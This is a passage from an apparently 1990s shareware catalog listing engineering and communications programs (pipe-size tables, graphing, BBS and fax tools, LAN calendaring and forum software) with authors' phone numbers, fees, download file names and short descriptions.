shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; MAPDRW.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 20 (or contact userID 76534,1166 + for assistance). + SWREG#: 6508 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Deep plotting system draws maps based on metes and bounds + descriptions. Easy to use. Online display of maps as the data + is entered. Calculates gaps and acreage. Curves, closing, + scaling, multiple lots, conversions of 'old' measurements. High + quality printing on any Windows-compatible printer. The system + is currently used in most states. An ideal map drawing system + for real estate and title professionals! + + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 508. + + + 9.7 Engineering utilities + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 360. + + Product: CALC_JNC + The ultimate TSR programmers calculator. See full description + on page 122. + + Product: Convert It!(tm) SE [***] + Versatile unit of measure converter. See full description on + page 335. + + Chapter 9, "Engineering" 364 + + + + Product: Grafer Line Graphs for Reports + Author: , 803-224-2474 + Version: 2.1 (04-15-95) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; 3-month return + policy; bonus data; all ASP-wide offers (see page 5); discounts + on other products; discounts on upgrades. 3-month free + upgrading allowed. + Look for: GRAFER21.ZIP on BBSs; GRAFER.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 70404,3470 for + assistance). + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Makes ANSI look-alike graphs suitable for scientific and + engineering reports. Line graphs and scatter plots are built + from X-Y data entered from the keyboard, a text file, or the + Clipboard. The "Picture" graphs can be copied to the Clipboard + and pasted into other applications as an adjustable graph. + Saved graphs are in text file format. Printed graphs are + adjustable in size. Learn to graph with the samples included. + + + Product: I&M USA + Author: , 704-568-9598 + Version: 1.05 (05-05-94) + Needs: IBM AT (80286), DOS 3.2 or better. 1000k RAM; CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Strongly recommended: Hayes-compatible modem; EMS memory. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, fax, BBS, CompuServe, mail support; 2-month + return policy; LAN license; site license; bonus data; all ASP- + wide offers (see page 5); disks of other shareware. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: CTJII&.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJII&.* on CompuServe in CIS:LEAP + forum LIBrary 4 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3478 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Process controls directory of manufacturers cross referenced to + Instrument devices, representatives and distributors. Allows + you to look up a device and lists all manufacturers, then you + + Chapter 9, "Engineering" 365 + + + + select a Mfr and it shows you the rep or distributor. You + enter the records and link them through pop-up windows and it + is all menu driven. You can build a relational database for + any products or catagories, however, this version includes + catagories for instruments, most US Engr Assn and Instrument + Tech journals. + + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 358. + + Product: INSTSPEC + Author: , 704-568-9598 + Version: 1.0 (05-05-93) + Needs: IBM AT (80286), DOS 3.2 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + CGA monitor; Hercules monitor; HP DeskJet printer; HP LaserJet + printer; Epson printer. Lotus v2.x, Allways or WYSIWYG. + Strongly recommended: Dual 720k floppy drives; Postscript + printer. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 51/4" master disk(s); 12 + months of unlimited fax, BBS, CompuServe, mail support; 2-month + return policy; site license; all ASP-wide offers (see page 5); + disks of other shareware. 12-month free upgrading allowed. + Look for: INSTSPEC.EXE on BBSs (call 704-532-1236 to download it + at no charge); INSPEC.EXE on CompuServe in CIS:LEAP forum + LIBrary 4 (or contact userID 72760,1020 for assistance). + SWREG#: 3480 + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + Produce professional looking process controls instrument data + sheets for purchasing and engineering design. Based on ISA + outdated manual entry forms, but, updated for modern controls. + Uses DTP fonts to give professional appearence, not just ASCII + text. Made for HP Laser, but, works with dot matrix if you + presently have Lotus Allways or WYSIWYG. 35 Templates in all + from annunciators through control valves. + + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 123. + + Product: METRIC-X + Metric-English-Metric conversion utility. See full description + on page 334. + + Product: PLOTTER + Data plotting and analysis program. See full description on + page 397. + + Chapter 9, "Engineering" 366 + + + + Product: SmartDraw [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 506. + + Product: SmartDraw 95 [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 506. + + Product: Steam Properties + Helpful for analyzing power plants. See full description on + page 361. + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 439. + + Product: Units & Volumes [***] + Excel add-in, unit conv. & tank volumes. See full description + on page 232. + + 9.7.1 File format translators + + Product: REALIZE + Full converter from .DXF to POV raytracer. See full + description on page 504. + + + 9.8 Software tools & add-ins + + 9.8.1 For multiple programs + + Product: Playground + Tool for building object models. See full description on + page 399. + + Chapter 9, "Engineering" 367 + + + + 9.8.2 For other + + Product: Nominal Pipe Size for Windows + Author: , 519-366-2732 + Version: 2.1 (03-28-94) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $29.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, GEnie, mail support. 3-month + free upgrading allowed. + Look for: availability unknown on BBSs; PIPEW2.EXE on CompuServe + in CIS:PCAPP forum LIBrary 13 (or contact userID 72060,1153 for + assistance). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Displays dimensional, weight and flow capacity data for a wide + range of piping materials and sizes (over 3000 sizes of + standard and specialty pipes in over 25 materials). A must for + all piping engineers and students. + + + Product: NPS - Nominal Pipe Size + Author: , 519-366-2732 + Version: 2.1 (10-01-92) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $29.95 + Registration benefits: 3 months of support. 2-month free + upgrading allowed. + Look for: availability unknown on BBSs; PIPE2.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 13 (or contact userID 72060,1153 for + assistance). + Download size: 97k (about seven minutes with a 2400 baud modem) + Description: + Displays dimensional, weight and flow capacity data for a wide + range of piping materials and sizes. (Over 2000 sizes of + standard and specialty pipes in over 25 different materials). + Easy to use menu driven format with user selectable dimensional + units (US, Imperial or metric) and display colors. A must for + all piping engineers and students. + + Chapter 9, "Engineering" 368 + + + + 9.9 Other + + Product: DXF Bill of Materials Generator + Author: , 216-674-5444 + Version: DOS1.00 (03-01-95) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer; Epson + printer. + Registration fee: $33.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, fax, CompuServe, mail support; discounts on + upgrades. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; ANNA-BOM.ZIP on + CompuServe in CIS:ACAD forum LIBrary 10 (or contact userID + 75452,3723 for assistance). + SWREG#: 4335 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Generates bills of materials (BOM) from AutoCAD DXF files. The + system counts "Blocks" any of which may be included or excluded + in the BOM. TAGs may be inserted & edited in the descriptions. + The descriptions are fully editable as are the BOM page and + column headers. Context sensitive, on-line help is available + for most operations. The generator prints the BOM or saves it + as a delimited file. + + + Product: PROP OPTIMIZER (tm) + Author: , 916-622-1886 + Version: 1.90 (10-27-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; royalty-free runtime + license; discounts on other products; discounts on upgrades. + Look for: PROP19.ZIP on BBSs. + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Designs propellers for experimental and commercial aircraft. A + mathematical optimizer drives design variables to determine the + best propeller diameter, pitch, blade area and number of blades + for maximum cruise speed in a single pass optimization. Primary + input is engine horsepower versus rpm and drag area input. Drag + + Chapter 9, "Engineering" 369 + + + + area may be determined from a recorded aircraft performance or + estimated. Many educational and explanatory screens. Online + help is provided for easy input. + + Chapter 10, "Communications" 370 + + + + + + Chapter 10 + Communications + + + 10.1 General-purpose modem communications + + Product: BBS Communications + Author: , 216-659-9489 + Version: 2.18 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Modem. + Strongly recommended: CGA monitor; Hercules monitor; Dual 720k + floppy drives; Hard disk; Hayes-compatible modem; Mouse. + Registration fee: $29.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: BBS218.ZIP on BBSs (call 216-661-9065 to download it at + no charge); BBS218.ZIP on CompuServe in CIS:PCBBS forum LIBrary + 0 (or contact userID 73057,3113 for assistance); BBS218.ZIP on + GEnie in IBMPC forum LIBrary 0. + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + A general communications program for uploading and downloading + files to/from bulletin board systems. Many protocols including + ASCII, Xmodem, Ymodem, Zmodem, and Kermit with multiple + variations. Keeps of track of last time each BBS called and + how long spent on each one. Easy to set up and use. + + + Product: COM-AND + Author: , 310-439-6104 + Version: 2.93 (11-17-93) + Needs: IBM PC, DOS 2.0 or better. 384k RAM. Modem or serial + port. + Registration fee: $50.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 3 months of support; bonus utilities. + Look for: CA29-*.ZIP on BBSs (multiple files) (call 310-439-7714 + to download it at no charge); CA29-*.ZIP on CompuServe in + CIS:PCCOM forum LIBrary 3 (multiple files) (or contact userID + 73147,2665 for assistance); CA29-*.ZIP on GEnie in IBMPC forum + + Chapter 10, "Communications" 371 + + + + LIBrary 6 (multiple files) (or contact userID TARTAN for + assistance). + Download size: 771k (about 57 minutes with a 2400 baud modem) + Description: + A general purpose communications program that may be used by + itself, or with several integrated accessories. Provides + standard comm program functions: dialing directories, macros, + disk log and backscreen, binary and ASCII file transfers, + scripted execution, ASCII text editor, and so on. Included are + scripts providing a file/directory management (FILEMGR), a + learning mode (LEARN), modem/modemless PC to PC file copy + (PC-2-PC) and more. + + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 73. + + Product: FAXHAVEN + HQFAX ver 2 PLUS one-touch FAX receive help. See full + description on page 387. + + Product: HQ-FAX (1-Step High Quality FAX + One-step high quality FAX. See full description on page 387. + + Product: Link + Author: , +81-3-3207-4553 + Version: 2.1 (05-01-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hayes- + compatible modem; Mouse; XMS memory; VBRUN300.DLL. + Strongly recommended: Network (LAN). + Registration fee: $20.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). 6-month free upgrading allowed. + Look for: LINK.ZIP on BBSs; LINK.ZIP on GEnie in 1212 forum + LIBrary 0. + SWREG#: 4204 + PsL#: 14098 + Download size: 162k (about twelve minutes with a 2400 baud modem) + Description: + Connects your communications program to your callback service. + It will automize the connect procedure and start your + communications program allowing you to swiftly connect to your + server. You can also voice dial, time your calls and keep a + record of both voice and computer time. You can also print your + records. + + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 156. + + Chapter 10, "Communications" 372 + + + + Product: VB-Dial + Multimedia phone dialer/comm package. See full description on + page 130. + + Product: wfListen + Author: + Version: 3.00 (03-28-94) + Needs: IBM AT (80286), Windows 3.1 or better. Modem. WinFax Pro + (version 2 or 3) or WinFax Lite. + Strongly recommended: Mouse. + Registration fee: $6.00 + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support; 3-month limited return policy; all ASP-wide + offers (see page 5). Lifetime free upgrading allowed. + Look for: WFLIS300.ZIP on BBSs (multiple files) (call + 909-681-6221 to download it at no charge); WFLISN.ZIP on + CompuServe in CIS:DELRINA forum LIBrary 3 (multiple files) (or + contact userID 73770,660 for assistance). + SWREG#: 2113 + Download size: 233k (about 18 minutes with a 2400 baud modem) + Description: + For fax-modem owners who use WinFax Pro from Delrina, and who + also use a DOS- or Windows-based comms program. It disables and + re-enables WinFax auto receive (AR). This is useful with comms + programs because they require you to disable AR while they are + running, and it's easy to forget to switch AR back on. Will + silently disable AR, launch your comms program, wait for it to + finish, and then re-enable AR. Optional installable languages: + French and German. + + + Product: WinNET Mail for MS Windows + Author: , 502-589-6800 + Version: 2.11 (03-24-94) + Needs: IBM 80386, Windows 3.1 or better. 1024k RAM; EGA monitor; + Hard disk; Modem. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $99.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; lifetime limited return policy; + bonus utilities; all ASP-wide offers (see page 5); disks of + other shareware. Lifetime free upgrading allowed. + Look for: WNMAIL??.ZIP on BBSs; WNMAIL.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 76130,1463 for + assistance). + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + A Windows MDI application that provides access to any Internet/ + Usenet UUCP service. Account setup with WinNET service is + automatic and the software is extremely easy to use with point + and click functionality and low cost 800 number access. Full + access to 6000+ news groups including Clarinet and alt groups. + Has integrated mail and article threading news reader, 14.4KB + + Chapter 10, "Communications" 373 + + + + v.42bis store forward connect, dial-up scheduler, on-line help, + integrated uuencode/decode, and user-definable folders, and + more. + + + 10.2 Service-specific programs + + Product: Link + Connects program to callback service. See full description on + page 371. + + 10.2.1 For CompuServe + + Product: COM-AND + Communications and accessories. See full description on + page 370. + + Product: PC Chart + Charting program for stocks & commodities. See full + description on page 338. + + Product: Recon + Author: + Version: 2.50 (09-19-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor; EMS memory; XMS memory. + Registration fee: $38.00 (add $7.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe support; bonus + utilities; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: RECON.ZIP on BBSs (multiple files); RECON.ZIP on + CompuServe in CIS:TAPCIS forum LIBrary 2 (multiple files) (or + contact userID 76672,1273 for assistance). + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + CompuServe message file manager, with message/reply editor & + script generator, pulldown menus & command line mode. New + PreScan summary for files. Handles forum messages, CMail & + INTERNET. Keeps files trimed and sorted into context, Menu + SHELL organizes your navigator & add-ons. Sysop commands, + changes immediately reflected in file. Powerful file navigation + & viewing, multiple sorts, duplicate deletion, filters, search, + print, edit, delete, move or auto-age messages. Context + sensitive help. + + Chapter 10, "Communications" 374 + + + + 10.2.2 For GEnie + + Product: Alad_IRQ + Author: , 404-263-8623 + Version: 1.0 (12-27-93) + Needs: IBM PC, DOS 2.1 or better. 8k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, + GEnie, mail support; bonus utilities; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. + Look for: ALAIRQ10.EXE on BBSs; ALAIRQ10.EXE on GEnie in + ALADDINSUP forum LIBrary 2 (or contact userID J.JERRIM for + assistance). + Download size: 31k (about three minutes with a 2400 baud modem) + Description: + Allows the GEnie Aladdin software to use any IRQ (2-7, 9-12, 14 + or 15) supported by your serial port or modem. Creates a run- + time environment for Aladdin that uses 8k of RAM. + + + Product: PC Chart + Charting program for stocks & commodities. See full + description on page 338. + + 10.2.3 For Internet + + Product: WebForms + Author: , 201-635-1824 + Version: 1.0h (06-15-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: Modem. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, CompuServe, mail support; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: WBFRM10H.ZIP on BBSs; WBFRM.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 6011 + PsL#: 14064 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + Lets you create HTML forms for posting on the World Wide Web + with no prior HTML knowledge! Consists of two modules. The + Forms Generator, lets you design the form to your + specifications and creates the HTML file automatically. Then + + Chapter 10, "Communications" 375 + + + + you just upload the form to your Web Server and wait for the + responses to roll in to your Internet mailbox. The Response + Reader decodes the messages you receive and loads them into a + table for easy viewing. Great for order-taking! + + + Product: WebParse + Author: , 610.640.0339 + Version: 1.1 (09-05-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; WEBPAR.ZIP on CompuServe + in CIS:INTERNET R forum LIBrary 9 (or contact userID 76534,1166 + for assistance). + SWREG#: 7260 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Extracts, parses, converts and formats the web mailto messages + in e-mail inbox files to comma-delimited ASCII text for easy + import to databases. Extracted data can also be viewed as a + spreadsheet. Versatile and easy to use. + + + 10.3 Bulletin boards + + Product: COM-AND + Communications and accessories. See full description on + page 370. + + Product: ES-NEWS + Network login news manager. See full description on page 377. + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 385. + + Product: x-FORUM3 + Network message forum system. See full description on + page 380. + + Product: x-FORUM4 + Network message forum system for Windows. See full description + on page 381. + + Product: x-NEWS3 + Network news login system. See full description on page 386. + + Chapter 10, "Communications" 376 + + + + 10.3.1 Bulletin board utilities + + Product: BBS Communications + BBS communications for uploading/downloading. See full + description on page 370. + + Product: Medieval War Door + Author: , 312-922-6313 + Version: 1.0 (02-21-95) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; CGA monitor; Hard + disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, BBS, CompuServe, mail support; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + Lifetime free upgrading allowed. + Look for: MEDOOR10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); MEDOO*.ZIP on CompuServe in CIS:PCBBS forum + LIBrary 4 (or contact userID 71532,3271 for assistance). + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + A BBS door game of medieval war/strategy. From 2-6 players + compete on a map of up to 100 x 100 and up to 50 games may be + played simultaneously. Almost any BBS may be configured to play + it including PCBoard and Wildcat! + + + 10.4 Networks + + See also: Utilities, Menu systems & file managers. + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 101. + + Chapter 10, "Communications" 377 + + + + Product: COMpanion + Author: + Version: 1.2 (08-01-94) + Needs: IBM PC, DOS 2.0 or better. 12k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $50.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $14.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited CompuServe, mail support; + discounts on upgrades. 2 EBD connectors, COM Finder, 50' + cable, inline coupler, flipping cable. + Look for: COMP12.ZIP on BBSs (call 415-323-4398 to download it at + no charge); COMP12.ZIP on CompuServe in CIS:PCCOM forum LIBrary + 11 (or contact userID 72603,3215 for assistance). + SWREG#: 3861 + Download size: 96k (about seven minutes with a 2400 baud modem) + Description: + Access disks and printers on another PC using a remote drive + letter and LPT3. Average transfer rate 14K bytes/sec. using EBD + connectors (7K using standard null modem). Disk device driver + on client PC uses 12 Kbytes, server 30K. Use DESQview(tm) and + Stacker(r) to network 3 to 5 PCs (DOS 3.2+). Dynamic mapping of + 1 to 4 drive letters. Drives and printers accessible from + Windows(tm). Does not use interrupts, so will not conflict with + other serial devices. + + + Product: ES-NEWS + Author: , 407-344-3322 + Version: 2.29 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; CGA monitor; Hard + disk. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; ESNEWS.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4279 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Provides for login new and bulletin display per predefined + news/user groups. Includes built-in administration of news + text, display options, and user groups. Network-aware of both + Banyan VINES(R) and Novell NetWare(R). + + Chapter 10, "Communications" 378 + + + + Product: Power Edit + Author: , +81-3-3207-4553 + Version: 2.02 (06-15-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Network + (LAN); XMS memory; VBRUN300.DLL. + Strongly recommended: Mouse; sound card. + Registration fee: $35.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 6 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). 6-month free upgrading allowed. + Look for: POWREDIT.ZIP on BBSs; POWREDIT.ZIP on GEnie in 1213 + forum LIBrary 0. + SWREG#: 5674 + PsL#: 14096 + Download size: 331k (about 25 minutes with a 2400 baud modem) + Description: + A powerful network tool allowing spellchecking, file + encryption, sending and viewing Email and advanced editing + options. Plus full control of desktop including fonts, sounds + and colors. Opens numerous file types and gives user control + over his network Email. Customizable toolbar with ruler and + multiple statusbars. + + + Product: Search-N-Store + Fast network or standalone database. See full description on + page 236. + + Product: x-CAL3 + Author: , 407-344-3322 + Version: 3.31 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XCAL3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1110 + PsL#: 10884 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Features private, alternate, and workgroup calendaring with + meeting scheduler, online help, TSR option, and x-CAL3 + administration. Easy-to-use and network-aware of both Banyan + VINES(R) and Novell NetWare(R). + + Chapter 10, "Communications" 379 + + + + Product: x-CON3 + Author: , 407-344-3322 + Version: 1.44 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime phone, fax, CompuServe, newsletter, mail support; LAN + license; all ASP-wide offers (see page 5); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XCON3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1123 + PsL#: 10885 + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Features up to 99 different contact groups (including private), + user security per group, configurable prompts, TSR mode, online + help, and x-CON3 administration. Easy-to-use and network-aware + of both Banyan VINES(R) and Novell NetWare(R). + + + Product: x-FILE3 + Author: , 407-344-3322 + Version: 1.74 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFILE3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1124 + PsL#: 10886 + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Allows controlled access to public files with selectable + upload/download access, filtered listings, TSR mode, online + help, and x-FILE3 administration. Easy-to-use and network-aware + of both Banyan VINES(R) and Novell NetWare(R). + + Chapter 10, "Communications" 380 + + + + Product: x-FONE3 + Author: , 407-344-3322 + Version: 2.18 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFONE3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1111 + PsL#: 10887 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Features custom-defined prompts, display sorts, TSR mode, + online help, built-in security levels, and x-FONE3 + administration. Easy-to-use and network-aware of both Banyan + VINES(R) and Novell NetWare(R). + + + Product: x-FONE4 + Author: , 407-344-3322 + Version: 1.25 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 5); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XFONE4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4280 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Features custom-defined prompts, display sorts, online help, + multi-level security, display update, import options, and + built-in x-FONE4 administration. Low-cost, easy-to-use, and + simple-to-manage. Network-aware of both Novell NetWare(R) and + Banyan VINES(R). + + Chapter 10, "Communications" 381 + + + + Product: x-FORUM3 + Author: , 407-344-3322 + Version: 1.28 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFORUM.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1311 + PsL#: 10942 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A workgroup conferencing system offering up to 26 message + forums, interactive or read-only forum types, message create/ + read/reply, new message indicators, TSR mode, online help, and + x-FORUM3 administration. Easy-to-use and network-aware of + Banyan VINES(R) and Novell NetWare(R). + + + Product: x-FORUM4 + Author: , 407-344-3322 + Version: 1.12 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + 